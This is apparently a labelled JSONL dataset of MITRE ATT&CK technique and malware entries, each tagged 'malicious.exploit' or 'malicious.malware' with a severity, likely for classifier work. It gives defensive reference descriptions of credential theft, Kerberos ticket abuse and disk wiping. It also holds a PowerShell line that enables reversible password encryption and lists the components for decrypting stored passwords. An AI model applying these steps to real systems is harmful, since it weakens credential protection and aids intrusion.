{"id": "mitre_00559", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Archive Collected Data\n\nTechnique: T1560\nTactics: collection\nPlatforms: Linux, macOS, Windows\n\nAn adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1560", "technique_name": "Archive Collected Data", "tactics": ["collection"]}}]}
{"id": "mitre_00560", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Databases\n\nTechnique: T1213.006\nTactics: collection\nPlatforms: Linux, Windows, macOS, IaaS, SaaS\n\nAdversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). \n\nExamples of databases from which information may be collected include MySQL, PostgreSQL, MongoDB, Amazon Relational Database Service, Azure SQL Database, Google Firebase, and Snowflake. Databases may include a variety of information of interest to adversaries, such as usernames, hashed passwords, personally identifiable information, and financial data. Data collected from databases may be used for [Lateral Movement](https://attack.mitre.org/tactics/TA0008), [Command and Control](https://attack.mitre.org/tactics/TA0011), or [Exfiltration](https://attack.mitre.org/tactics/TA0010). Data exfiltrated from databases may also be used to extort victims or may be sold for profit.(Citation: Google Cloud Threat Intelligence UNC5537 Snowflake 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1213.006", "technique_name": "Databases", "tactics": ["collection"]}}]}
{"id": "mitre_00561", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# IcedID\n\nType: malware\nPlatforms: Windows\n\n[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "IcedID", "malware_type": "malware"}}]}
{"id": "mitre_00562", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Ccache Files\n\nTechnique: T1558.005\nTactics: credential-access\nPlatforms: Linux, macOS\n\n\nAdversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. \n\nThe /etc/krb5.conf configuration file and the KRB5CCNAME environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using kinit, which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1558.005", "technique_name": "Ccache Files", "tactics": ["credential-access"]}}]}
{"id": "mitre_00563", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Reversible Encryption\n\nTechnique: T1556.005\nTactics: credential-access, defense-evasion, persistence\nPlatforms: Windows\n\nAn adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters\n2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters\n3. Global LSA secret (G$MSRADIUSCHAPKEY)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1556.005", "technique_name": "Reversible Encryption", "tactics": ["credential-access", "defense-evasion", "persistence"]}}]}
{"id": "mitre_00564", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Elise\n\nType: malware\nPlatforms: Windows\n\n[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Elise", "malware_type": "malware"}}]}
{"id": "mitre_00565", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# YAHOYAH\n\nType: malware\nPlatforms: Windows\n\n[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "YAHOYAH", "malware_type": "malware"}}]}
{"id": "mitre_00566", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# QuietSieve\n\nType: malware\nPlatforms: Windows\n\n[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "QuietSieve", "malware_type": "malware"}}]}
{"id": "mitre_00567", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# FALLCHILL\n\nType: malware\nPlatforms: Windows\n\n[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "FALLCHILL", "malware_type": "malware"}}]}
{"id": "mitre_00568", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Application Layer Protocol\n\nTechnique: T1071\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows, Network Devices, ESXi\n\nAdversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1071", "technique_name": "Application Layer Protocol", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00569", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hidden File System\n\nTechnique: T1564.005\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564.005", "technique_name": "Hidden File System", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00570", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Masquerade Task or Service\n\nTechnique: T1036.004\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.004", "technique_name": "Masquerade Task or Service", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00571", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ZeroT\n\nType: malware\nPlatforms: Windows\n\n[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ZeroT", "malware_type": "malware"}}]}
{"id": "mitre_00572", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# FIVEHANDS\n\nType: malware\nPlatforms: Windows\n\n[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "FIVEHANDS", "malware_type": "malware"}}]}
{"id": "mitre_00573", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HIUPAN\n\nType: malware\nPlatforms: Windows\n\n[HIUPAN](https://attack.mitre.org/software/S1230) (aka U2DiskWatch) is a is a worm that propagates through removable drives known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2024. (Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)(Citation: Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HIUPAN", "malware_type": "malware"}}]}
{"id": "mitre_00574", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LC_MAIN Hijacking\n\nTechnique: T1149\nTactics: defense-evasion\nPlatforms: macOS\n\n**This technique has been deprecated and should no longer be used.**\n\nAs of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary\u2019s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn\u2019t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1149", "technique_name": "LC_MAIN Hijacking", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00575", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Component Firmware\n\nTechnique: T1542.002\nTactics: persistence, defense-evasion\nPlatforms: Windows, Linux, macOS\n\nAdversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1542.002", "technique_name": "Component Firmware", "tactics": ["persistence", "defense-evasion"]}}]}
{"id": "mitre_00576", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BFG Agonizer\n\nType: malware\nPlatforms: Windows\n\n[BFG Agonizer](https://attack.mitre.org/software/S1136) is a wiper related to the open-source project CRYLINE-v.5.0. The malware is associated with wiping operations conducted by the [Agrius](https://attack.mitre.org/groups/G1030) threat actor.(Citation: Unit42 Agrius 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BFG Agonizer", "malware_type": "malware"}}]}
{"id": "mitre_00577", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Default Accounts\n\nTechnique: T1078.001\nTactics: defense-evasion, persistence, privilege-escalation, initial-access\nPlatforms: Windows, SaaS, IaaS, Linux, macOS, Containers, Network Devices, Office Suite, Identity Provider, ESXi\n\nAdversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account\u2019s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1078.001", "technique_name": "Default Accounts", "tactics": ["defense-evasion", "persistence", "privilege-escalation", "initial-access"]}}]}
{"id": "mitre_00578", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Local Storage Discovery\n\nTechnique: T1680\nTactics: discovery\nPlatforms: ESXi, IaaS, Linux, macOS, Windows\n\nAdversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0109), or as a precursor to [Direct Volume Access](https://attack.mitre.org/techniques/T1006). \n\nOn ESXi systems, adversaries may use [Hypervisor CLI](https://attack.mitre.org/techniques/T1059/012) commands such as `esxcli` to list storage connected to the host as well as `.vmdk` files.(Citation: TrendMicro)(Citation: TrendMicro ESXI Ransomware)\n\nOn Windows systems, adversaries can use `wmic logicaldisk get` to find information about local network drives. They can also use `Get-PSDrive` in PowerShell to retrieve drives and may additionally use Windows API functions such as `GetDriveType`.(Citation: Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024)(Citation: Volexity)\n\nLinux has commands such as `parted`, `lsblk`, `fdisk`, `lshw`, and `df` that can list information about disk partitions such as size, type, file system types, and free space. The command `diskutil` on MacOS can be used to list disks while `system_profiler SPStorageDataType` can additionally show information such as a volume\u2019s mount path, file system, and the type of drive in the system. \n\nInfrastructure as a Service (IaaS) cloud providers also have commands for storage discovery such as `describe volume` in AWS, `gcloud compute disks list` in GCP, and `az disk list` in Azure.(Citation: AWS docs describe volumes)(Citation: GCP gcloud compute disks list)(Citation: azure az disk)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1680", "technique_name": "Local Storage Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00579", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ABK\n\nType: malware\nPlatforms: Windows\n\n[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ABK", "malware_type": "malware"}}]}
{"id": "mitre_00580", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Responder\n\nType: tool\n\nResponder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Responder", "malware_type": "tool"}}]}
{"id": "mitre_00581", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# TinyTurla\n\nType: malware\nPlatforms: Windows\n\n[TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "TinyTurla", "malware_type": "malware"}}]}
{"id": "mitre_00582", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disk Structure Wipe\n\nTechnique: T1561.002\nTactics: impact\nPlatforms: Linux, macOS, Windows, Network Devices\n\nAdversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1561.002", "technique_name": "Disk Structure Wipe", "tactics": ["impact"]}}]}
{"id": "mitre_00583", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CallMe\n\nType: malware\nPlatforms: macOS\n\n[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CallMe", "malware_type": "malware"}}]}
{"id": "mitre_00584", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AsyncRAT\n\nType: tool\nPlatforms: Windows\n\n[AsyncRAT](https://attack.mitre.org/software/S1087) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.(Citation: Morphisec Snip3 May 2021)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "AsyncRAT", "malware_type": "tool"}}]}
{"id": "mitre_00585", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KOMPROGO\n\nType: malware\nPlatforms: Windows\n\n[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KOMPROGO", "malware_type": "malware"}}]}
{"id": "mitre_00586", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# STEADYPULSE\n\nType: malware\nPlatforms: Network Devices\n\n[STEADYPULSE](https://attack.mitre.org/software/S1112) is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script that was used as early as 2020 including in activity against US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "STEADYPULSE", "malware_type": "malware"}}]}
{"id": "mitre_00587", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# File and Directory Discovery\n\nTechnique: T1083\nTactics: discovery\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1083", "technique_name": "File and Directory Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00588", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ServHelper\n\nType: malware\nPlatforms: Windows\n\n[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ServHelper", "malware_type": "malware"}}]}
{"id": "mitre_00589", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RawDisk\n\nType: tool\nPlatforms: Windows\n\n[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RawDisk", "malware_type": "tool"}}]}
{"id": "mitre_00590", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Password Cracking\n\nTechnique: T1110.002\nTactics: credential-access\nPlatforms: Linux, macOS, Windows, Network Devices, Office Suite, Identity Provider\n\nAdversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1110.002", "technique_name": "Password Cracking", "tactics": ["credential-access"]}}]}
{"id": "mitre_00591", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Server\n\nTechnique: T1583.004\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may buy, lease, rent, or obtain physical servers\u00a0that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) \n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1583.004", "technique_name": "Server", "tactics": ["resource-development"]}}]}
{"id": "mitre_00592", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Communication Through Removable Media\n\nTechnique: T1092\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAdversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1092", "technique_name": "Communication Through Removable Media", "tactics": ["command-and-control"]}}]}
